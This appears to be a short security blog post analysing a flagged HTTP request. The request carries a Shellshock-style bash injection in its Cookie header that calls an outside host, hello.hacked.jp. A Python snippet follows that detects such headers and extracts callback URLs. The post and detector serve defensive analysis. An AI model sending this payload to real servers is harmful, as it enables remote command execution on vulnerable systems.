Clever Domain Name

Posted in Attack of the Day

Saw this get flagged on Friday. The domain “hacked.jp” showing up in a questionable HTTP request kind of indicates the owner really thought through their plans.

    GET /cgi-sys/entropysearch.cgi HTTP/1.1
    Content-Type: text/html
    Cookie: () { x;};echo;/bin/bash -c "php -r \"file_get_contents('http://hello.hacked.jp/hello/?l=planetspork.com');\""
    Host: planetspork.com
    Accept: text/html, */*
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19
    X-Forwarded-For: 77.79.40.195

A guy might be curious what lived at hello.hacked.jp, I know I was.

    Lappy486:arf imhoff$ telnet hello.hacked.jp 80
    Trying 31.184.192.233...
    Connected to hello.hacked.jp.
    Escape character is '^]'.
    GET /hello/?l=planetspork.com HTTP/1.0
    HTTP/1.1 […]
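A defender-side check for the pattern in the request above, as an added example that is not part of the original post: it flags any header whose value starts with the bash function-definition prefix `() {` (the Shellshock-style probe seen in the Cookie header) and extracts the callback URL it tries to fetch. The function names and the benign sample request are assumptions made for illustration.

```python
import re

# Constructed samples: the request quoted in the post (trimmed) and a benign one.
FLAGGED = (
    "GET /cgi-sys/entropysearch.cgi HTTP/1.1\r\n"
    "Content-Type: text/html\r\n"
    "Cookie: () { x;};echo;/bin/bash -c \"php -r \\\"file_get_contents("
    "'http://hello.hacked.jp/hello/?l=planetspork.com');\\\"\"\r\n"
    "Host: planetspork.com\r\n"
    "X-Forwarded-For: 77.79.40.195\r\n\r\n"
)
BENIGN = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: planetspork.com\r\n"
    "Cookie: session=abc123; theme=dark\r\n\r\n"
)

# bash serialises an exported function as a value beginning with "() {";
# a legitimate HTTP header value has no reason to start that way.
FUNC_DEF = re.compile(r"^\s*\(\)\s*\{")
URL = re.compile(r"https?://[^\s'\"\\)]+")

def parse_headers(raw):
    """Return (request_line, [(name, value), ...]) from a raw HTTP request."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")  # split on the first colon only
        if sep:
            headers.append((name.strip(), value.strip()))
    return lines[0], headers

def inspect(raw):
    """Flag headers carrying the function-definition prefix and list callback URLs."""
    request_line, headers = parse_headers(raw)
    host = dict(headers).get("Host", "")
    findings = []
    for name, value in headers:
        if FUNC_DEF.search(value):
            urls = URL.findall(value)
            findings.append({
                "header": name,
                "path": request_line.split(" ")[1],
                "callbacks": urls,
                # True when the callback reports which host responded
                "names_host": bool(host) and any(host in u for u in urls),
            })
    return findings
```

The extracted callback host is worth checking against outbound proxy or DNS logs, since a request to it from the web server means the injected command actually ran.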